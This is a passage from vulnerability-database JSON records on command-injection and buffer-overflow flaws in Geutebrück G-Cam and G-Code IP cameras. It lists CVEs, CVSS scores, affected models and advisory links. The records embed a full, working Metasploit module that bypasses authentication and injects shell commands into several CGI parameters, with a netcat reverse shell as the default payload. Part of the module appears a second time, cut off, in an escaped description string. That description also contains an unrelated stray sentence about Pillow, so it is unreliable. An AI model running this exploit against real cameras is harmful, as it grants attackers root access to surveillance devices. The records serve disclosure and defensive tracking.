"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158068"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2088"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33549"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/164191/geutebruck-instantrec-remote-command-execution.html"
},
{
"trust": 1.7,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33549"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/121.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33549"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2088"
},
{
"db": "NVD",
"id": "CVE-2021-33549"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33549"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2088"
},
{
"db": "NVD",
"id": "CVE-2021-33549"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-13T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33549"
},
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2088"
},
{
"date": "2021-09-13T18:15:22.773000",
"db": "NVD",
"id": "CVE-2021-33549"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-27T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33549"
},
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2088"
},
{
"date": "2021-09-27T14:30:08.640000",
"db": "NVD",
"id": "CVE-2021-33549"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2088"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
}
],
"trust": 0.6
}
}
VAR-202109-0849
Vulnerability from variot - Updated: 2025-01-30 20:38Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
'Author' => [
'Titouan Lazard', # Of RandoriSec - Discovery
'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33543'],
['CVE', '2021-33544'],
['CVE', '2021-33548'],
['CVE', '2021-33550'],
['CVE', '2021-33551'],
['CVE', '2021-33552'],
['CVE', '2021-33553'],
['CVE', '2021-33554'],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'CVE-2021-33544 - certmngr.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'createselfcert',
'local' => Rex::Text.rand_text_alphanumeric(10..16),
'country' => Rex::Text.rand_text_alphanumeric(2),
'state' => '$(PLACEHOLDER_CMD)',
'organization' => Rex::Text.rand_text_alphanumeric(10..16),
'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
'days' => Rex::Text.rand_text_numeric(2..4),
'type' => Rex::Text.rand_text_numeric(2..4)
},
'uri' => '/../uapi-cgi/certmngr.cgi'
}
],
[
'CVE-2021-33548 - factory.cgi', {
'http_method' => 'GET',
'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/factory.cgi'
}
],
[
'CVE-2021-33550 - language.cgi', {
'http_method' => 'GET',
'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/language.cgi'
}
],
[
'CVE-2021-33551 - oem.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'set',
'enable' => 'yes',
'environment.lang' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/oem.cgi'
}
],
[
'CVE-2021-33552 - simple_reclistjs.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'get',
'timekey' => Rex::Text.rand_text_numeric(2..4),
'date' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
}
],
[
'CVE-2021-33553 - testcmd.cgi', {
'http_method' => 'GET',
'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
'uri' => '/../uapi-cgi/testcmd.cgi'
}
],
[
'CVE-2021-33554 - tmpapp.cgi', {
'http_method' => 'GET',
'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/tmpapp.cgi'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
end
def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end
unless res&.body && !res.body.empty?
print_error('Empty body in the response!')
return false
end
res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
print_error('Target did not respond with a XML document containing the "firmware" element!')
return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
false
end
end
def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end
rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit print_status("#{rhost}:#{rport} - Setting up request...")
method = target['http_method']
if method == 'GET'
http_method_vars = 'vars_get'
else
http_method_vars = 'vars_post'
end
http_vars = target['http_vars']
http_vars.each do |(k, v)|
if v.include? 'PLACEHOLDER_CMD'
http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
end
end
print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
{
'method' => method,
'uri' => target['uri'],
http_method_vars => http_vars
}
)
print_status('Exploit complete, you should get a shell as the root user!')
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0849",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33553"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2083"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33553",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33553",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33553",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33553",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33553",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2083",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2083"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33553"
},
{
"db": "NVD",
"id": "CVE-2021-33553"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user. \n },\n\n \u0027Author\u0027 =\u003e [\n \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272021-33543\u0027],\n [\u0027CVE\u0027, \u00272021-33544\u0027],\n [\u0027CVE\u0027, \u00272021-33548\u0027],\n [\u0027CVE\u0027, \u00272021-33550\u0027],\n [\u0027CVE\u0027, \u00272021-33551\u0027],\n [\u0027CVE\u0027, \u00272021-33552\u0027],\n [\u0027CVE\u0027, \u00272021-33553\u0027],\n [\u0027CVE\u0027, \u00272021-33554\u0027],\n [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n 